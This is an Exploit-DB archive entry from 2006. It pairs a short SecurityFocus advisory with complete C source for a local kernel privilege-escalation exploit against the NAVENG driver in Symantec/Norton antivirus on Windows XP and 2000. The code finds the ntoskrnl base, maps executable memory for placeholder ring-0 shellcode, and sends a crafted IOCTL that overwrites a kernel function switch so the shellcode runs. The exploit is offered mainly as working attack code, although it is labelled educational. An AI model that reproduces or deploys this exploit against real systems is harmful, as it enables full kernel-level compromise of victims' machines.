Symantec AntiVirus - IOCTL Kernel Privilege Escalation (1)

EDB-ID:

28763




Platform:

Windows

Date:

2006-08-26


/*
source: https://www.securityfocus.com/bid/20360/info

Symantec AntiVirus is prone to a privilege-escalation vulnerability.

Local attackers can exploit this issue to corrupt memory and execute arbitrary code with kernel-level privileges. Successful exploits may facilitate a complete system compromise.

This issue affects only Symantec and Norton antivirus products running on Microsoft Windows NT, Windows 2000, and Windows XP.
*/

////////////////////////////////////
///// Norton Internet Security
////////////////////////////////////
//// For educational purposes ONLY
////
//// Kernel Privilege Escalation #1
//// Exploit
//// Rub�n Santamarta 
//// www.reversemode.com
//// 26/08/2006
////
////////////////////////////////////



#include <windows.h>
#include <stdio.h>

#define WXP_SWITCH 0xA5522
#define W2K_SWITCH 0x91531

typedef BOOL (WINAPI *PENUMDEVICES)(LPVOID*,
									DWORD ,
									LPDWORD);

typedef DWORD (WINAPI *PGETDEVNAME)(LPVOID ImageBase,
									LPTSTR lpBaseName,
									DWORD nSize);


VOID ShowError()
{
 LPVOID lpMsgBuf;
 FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER| FORMAT_MESSAGE_FROM_SYSTEM,
               NULL,
               GetLastError(),
               MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
               (LPTSTR) &lpMsgBuf,
               0,
               NULL);
 MessageBoxA(0,(LPTSTR)lpMsgBuf,"Error",0);
 exit(1);
}

int main(int argc, char *argv[])
{

 DWORD				*OutBuff,*InBuff,*ShellAddr;			
 DWORD				dwIOCTL,OutSize,InSize,junk,cb,devNum,i,Ring0Addr;
 HANDLE				hDevice;
 PENUMDEVICES pEnumDeviceDrivers;
 PGETDEVNAME  pGetDeviceDriverBaseName;
 LPVOID arrMods[200],addEx;
 DWORD BaseNt=0,BaseAuxNt;
 BOOL InXP;
 CHAR baseName[MAX_PATH];
 
 //"PUT YOUR RING0 CODE HERE "
 unsigned char Ring0ShellCode[]="\xcc\x90\x90\x90";       
 
  system("cls");
 
  printf("\n################################\n");
  printf("## Norton I.S                 ##\n");
  printf("## Ring0 Exploit              ##\n");
  printf("################################\n");
  printf("\nRuben Santamarta\nwww.reversemode.com\n\n");
  
 if(argc<2)
 {
  
 
  printf("\nusage> exploit.exe <XP> or <2K>\n");
  exit(1);
 }
 

 pEnumDeviceDrivers=(PENUMDEVICES)GetProcAddress(LoadLibrary("psapi.dll"),
												 "EnumDeviceDrivers");

 pGetDeviceDriverBaseName=(PGETDEVNAME)GetProcAddress(LoadLibrary("psapi.dll"),
												 "GetDeviceDriverBaseNameA");

 pEnumDeviceDrivers(arrMods,sizeof(arrMods),&cb);
 devNum=cb/sizeof(LPVOID);
 printf("\n[!] Searching Ntoskrnl.exe Base Address...");

 for(i=0;i<=devNum;i++)
 {
       pGetDeviceDriverBaseName(arrMods[i],baseName,MAX_PATH);
	   if((strncmp(baseName,"ntoskr",6)==0))
	   {
	  	   printf("[%x] Found!\n",arrMods[i]);
		   BaseNt = (DWORD)arrMods[i];
		   BaseAuxNt = BaseNt;
	   }
 }
 
if (!BaseNt) 
{
   printf("!!? ntoskrnl.exe base address not found\nexiting\n\n");
   exit(0);
}


//////////////////////
///// CASE 'DosDevice'
//////////////////////

hDevice = CreateFile("\\\\.\\NAVENG",
                     0,
                     0,
                     NULL,
                     3,
                     0,
                     0);

//////////////////////
///// INFO 
//////////////////////
 if (hDevice == INVALID_HANDLE_VALUE) ShowError();
 
 printf("\n\n** Initializing Exploit]\n\n");
 printf("INFORMATION \n");
 printf("-----------------------------------------------------\n");
 printf("[!] NAVENG Device Handle [%x]\n",hDevice);
 

 

 //////////////////////
 ///// IOCTL
 //////////////////////
 OutSize = 4;
 dwIOCTL = 0x222AD3;
 
 
 if(strncmp(argv[1],"XP",2)==0)  Ring0Addr = BaseNt + WXP_SWITCH;
 else                            Ring0Addr = BaseNt + W2K_SWITCH;

 printf("[!] Overwriting NtQuerySystemInformation Switch at [0x%x]\n",Ring0Addr);

 ShellAddr=(DWORD*)VirtualAlloc((LPVOID)0x2000000
                                ,0xF000
                                ,MEM_COMMIT|MEM_RESERVE
                                ,PAGE_EXECUTE_READWRITE);
 
 
 for(i=1;i<0x3C00;i++) ShellAddr[i]=(DWORD)ShellAddr; // paged out
 memcpy((LPVOID)ShellAddr,(LPVOID)Ring0ShellCode,sizeof(Ring0ShellCode));
 
 printf("\n\n\t\t[!] Initializing Countdown,last chance to abort.");
 
 for(i=10;i>=1;i--)
 {
   printf("\r -[ %d ]- ",i);
   if(i==1) printf("\n\n[*] Executing ShellCode");
   Sleep(1000);
 }      
         
 DeviceIoControl(hDevice, 
                 dwIOCTL, 
                 (LPVOID)0,0,
                 (LPVOID)Ring0Addr,OutSize,
                 &junk,  
                 NULL);
                 
 system("dir");  // NtQuerySystemInformation Nasty Hack ;
 
 /////////////////////
 ///// CLeanUp
 /////////////////////
 
 CloseHandle(hDevice);
 free(ShellAddr);
 
 printf("\n\n[*] Exploit terminated\n\n");
 return 0;
}